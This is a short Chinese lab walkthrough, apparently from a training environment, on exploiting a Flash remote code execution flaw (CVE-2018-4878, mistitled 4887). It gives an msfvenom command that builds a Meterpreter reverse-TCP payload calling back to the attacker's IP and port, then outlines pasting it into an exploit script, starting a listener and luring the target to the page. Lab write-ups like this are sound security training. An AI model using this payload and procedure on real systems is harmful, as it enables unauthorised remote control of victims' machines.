CVE-2018-4887 Flash漏洞

目录

1.目的

2.原理

3.操作过程

​编辑

总结


1.目的

由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali  Linux控制

2.原理

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。Meterpreter:一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接

3.操作过程

进入操作机,生成恶意软件,命令为:msfvenom -p  windows/meterpreter/reverse_tcp  lhost=10.143.0.114  lport=8888 -f  python>/root/shellcode.txt,其中lhost为kali的IP地址,lport为自定义的端口号

CVE-2018-4887 Flash漏洞_第1张图片

2.查看代码并复制,查看命令为cat  /root/shellcode.txt。

CVE-2018-4887 Flash漏洞_第2张图片3.CVE-2018-4878.py,将复制的代码覆盖原本的代码。

cd /root/flash/

gedit cve-2018-4878.py

结果:

CVE-2018-4887 Flash漏洞_第3张图片

修改代码。85与89行

CVE-2018-4887 Flash漏洞_第4张图片

CVE-2018-4887 Flash漏洞_第5张图片

开启监听

CVE-2018-4887 Flash漏洞_第6张图片

CVE-2018-4887 Flash漏洞_第7张图片

在目标机上下载flash

CVE-2018-4887 Flash漏洞_第8张图片

访问网页

CVE-2018-4887 Flash漏洞_第9张图片

CVE-2018-4887 Flash漏洞_第10张图片

在操作机上可以访问到目标机

CVE-2018-4887 Flash漏洞_第11张图片

总结

了解了漏洞的基本实现,以及相关语法操作与网络知识

你可能感兴趣的:(网络安全)